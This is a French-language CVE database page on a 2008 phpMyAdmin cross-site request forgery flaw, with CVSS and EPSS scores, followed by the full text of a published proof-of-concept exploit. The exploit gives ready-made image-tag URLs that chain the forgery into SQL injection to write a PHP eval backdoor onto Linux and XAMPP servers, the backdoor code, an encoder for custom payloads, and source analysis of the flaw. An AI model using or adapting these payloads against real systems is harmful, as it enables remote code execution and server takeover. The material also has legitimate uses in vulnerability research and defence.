CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Cross-site request forgery (CSRF) vulnerability in phpMyAdmin 2.11.x before 2.11.9.4 and 3.x before 3.1.1.0 allows remote attackers to perform unauthorized actions as the administrator via a link or IMG tag to tbl_structure.php with a modified table parameter. NOTE: other unspecified pages are also reachable, but they have the same root cause. NOTE: this can be leveraged to conduct SQL injection attacks and execute arbitrary code.
Cross-Site Request Forgery (CSRF) The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
6
AV:N/AC:M/Au:S/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
30.86%
–
–
2022-04-03
–
–
30.86%
–
–
2022-07-17
–
–
30.86%
–
–
2022-07-24
–
–
30.86%
–
–
2023-01-22
–
–
30.86%
–
–
2023-03-12
–
–
–
1.47%
–
2023-11-26
–
–
–
1.53%
–
2024-02-11
–
–
–
1.53%
–
2024-06-02
–
–
–
1.53%
–
2024-11-17
–
–
–
1.53%
–
2024-12-22
–
–
–
1.4%
–
2025-03-09
–
–
–
1.4%
–
2025-01-19
–
–
–
1.4%
–
2025-03-09
–
–
–
1.4%
–
2025-03-18
–
–
–
–
0.56%
2025-04-15
–
–
–
–
0.56%
2025-04-15
–
–
–
–
0.56,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2008-12-07 23h00 +00:00 Auteur : Michael Brooks EDB Vérifié : Yes
Written by Michael Brooks
Special Thanks to str0ke and rGod
Intro:
phpMyAdmin is by far the most popular PHP project. Between
phpmyadmin and the xampp project there are more than 34+ million
downloads from sourceforge.net . This exploit was released along
side XSRF attacks against XAMPP and Simple Directory Listing
effectively breaking the top 3 php projects in the same day.
Vulnerable Software info:
SQL injection in phpMyAdmin by means of XSRF.
Exploit tested on Version 3.1.0 release on: 2008-12-01
Works with magic_quotes_gpc=On or Off.
Exploit information:
This is a Remote php code execution PoC exploit. The exploit is
dropping a php backdoor into /var/www/backdoor.php, this attack will
not work on the newest Ubuntu or Fedora... machines due to AppArmor
and SELinux respectively.
This is a XSRF attack to access SQL Injection so the same rules for
executing XSRF attacks still apply.
Steps for exploitation:
1)The Victim's browser must be authenticated to phpMyAdmin at the time
of attack.
2)You must know the URL to phpMyAdmin.
3)Finly, to execute the attack the Victim's browser then needs to
view the malicious img tag:
Exploit for *nix:
<html>
<img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+63%2C+62%29+into+outfile+%22%2Fvar%2Fwww%2Fbackdoor.php%22+--+1">
</html>
path:
/var/www/backdoor.php
backdoor:
<?php eval($_GET[e]);?>
Exploit for a Default XAMPP for Windows Version 1.6.8:
<html>
<img src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&table=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+115%2C+116%2C+114%2C+105%2C+112%2C+115%2C+108%2C+97%2C+115%2C+104%2C+101%2C+115%2C+40%2C+36%2C+95%2C+71%2C+69%2C+84%2C+91%2C+101%2C+93%2C+41%2C+41%2C+59%2C+63%2C+62%29+into+outfile+%22c%3A%2Fxampp%2Fhtdocs%2Fbackdoor.php%22+--+1">
</html>
path:
c:/xampp/htdocs/backdoor.php
backdoor:
<?php eval(stripslashes($_GET[e]));?>
The backdoor can be accessed via
http://10.1.1.10/backdoor.php?e=phpinfo();
As a side note, this attack is only GET based so no JavaScript or
ActionScript required! Screw you NoScript!!!
Technical Details:
The exact sql query that is being executed:
SELECT COUNT(*) FROM `TABLES` where 0 union select char(60, 63, 112,
104, 112, 32, 101, 118, 97, 108, 40, 36, 95, 71, 69, 84, 91, 101, 93,
41, 63, 62) into outfile "/var/www/backdoor.php" -- 1`;
The char() mysql function is being used because the first SQL query is
selecting integer values. The following php code can be used to
build a custom payload, the current payload is: <?php
eval($_GET[e])?>
<?php
print charEncode($_GET[code]);
function charEncode($string){
$char="char(";
$size=strlen($string);
for($x=0;$x<$size;$x++){
$char.=ord($string[$x]).", ";
}
$char[strlen($char)-2]=")%00";
return $char;
}
?>
retroGod showed me this encoding method back when milw0rm still had a forum.
By default, if this query is malformed it will redirect you to a
blank query window. This fooled me for a while, but then I modified
a line and then I could see that I was in fact causing a mysql error.
./phpmyadmin/libraries/dbi/mysql.dbi.lib.php line 126:
return mysql_query($query,$link);
change it to:
return mysql_query($query,$link) or die($query."<br>".mysql_error($link));
The query that is vulnerable to sql injection is being built in
./phpmyadmin/libraries/db_table_exists.lib.php on line: 63
$_result = PMA_DBI_try_query(
'SELECT COUNT(*) FROM `' .
PMA_sqlAddslashes($table, true) . '`;',
null, PMA_DBI_QUERY_STORE);
The PMA_sqlAddslashes() only disrupts the use of single quotes '.
This function doesn't protect against sql injection because it ignores
back-ticks ` and double-quotes ".
This attack is not a textbook example of XSRF, because phpMyAdmin does
have protection against XSRF. The token used to protect requests is
generated in a secure manner:
./phpmyadmin/libraries/session.ic.php line 96:
if (!isset($_SESSION[' PMA_token '])) {
$_SESSION[' PMA_token '] = md5(uniqid(rand(), true));
}
As a note the call to md5(); is superstitious. It doesn't add nor
does it subtract to the session security. Possible md5() collisions do
not affect the integrity of the cryptographic nonce.
The vulnerability is because some request variables are exempt from
token's protection. For instance the request variables 'db' and
'table' used in the attack are not unset().
./phpmyadmin/libraries/common.inc.php line 389:
if (! PMA_isValid($_REQUEST['token']) || $_SESSION[' PMA_token '] !=
$_REQUEST['token']) {
/**
* List of parameters which are allowed from unsafe source
*/
$allow_list = array(
/* needed for direct access, see FAQ 1.34
* also, server needed for cookie login screen (multi-server)
*/
'server', 'db', 'table', 'target',
/* Session ID */
'phpMyAdmin',
/* Cookie preferences */
'pma_lang', 'pma_charset', 'pma_collation_connection',
/* Possible login form */
'pma_servername', 'pma_username', 'pma_password',
/* rajk - for playing blobstreamable media */
'media_type', 'custom_type', 'bs_reference',
/* rajk - for changing BLOB repository file MIME type */
'bs_db', 'bs_table', 'bs_ref', 'bs_new_mime_type'
);
/**
* Require cleanup functions
*/
require_once './libraries/cleanup.lib.php';
/**
* Do actual cleanup
*/
PMA_remove_request_vars($allow_list);
}
and PMA_remove_request_vars() is in ./phpmyadmin/librarires/cleanup.lib.php:
function PMA_remove_request_vars(&$whitelist)
{
// do not check only $_REQUEST because it could have been overwritten
// and use type casting because the variables could have become
// strings
$keys = array_keys(array_merge((array)$_REQUEST, (array)$_GET,
(array)$_POST, (array)$_COOKIE));
foreach($keys as $key) {
if (! in_array($key, $whitelist)) {
unset($_REQUEST[$key], $_GET[$key], $_POST[$key], $GLOBALS[$key]);
} else {
// allowed stuff could be compromised so escape it
// we require it to be a string
if (isset($_REQUEST[$key]) && ! is_string($_REQUEST[$key])) {
unset($_REQUEST[$key]);
}
if (isset($_POST[$key]) && ! is_string($_POST[$key])) {
unset($_POST[$key]);
}
if (isset($_COOKIE[$key]) && ! is_string($_COOKIE[$key])) {
unset($_COOKIE[$key]);
}
if (isset($_GET[$key]) && ! is_string($_GET[$key])) {
unset($_GET[$key]);
}
}
}
}
As a note, the & in this function declaration
PMA_remove_request_vars(&$whitelist) means to pass the variable by
reference, however this function doesn't use that variable reference.
Again this is superstitious because it has no effect on the code
its self.
# milw0rm.com [2008-12-08]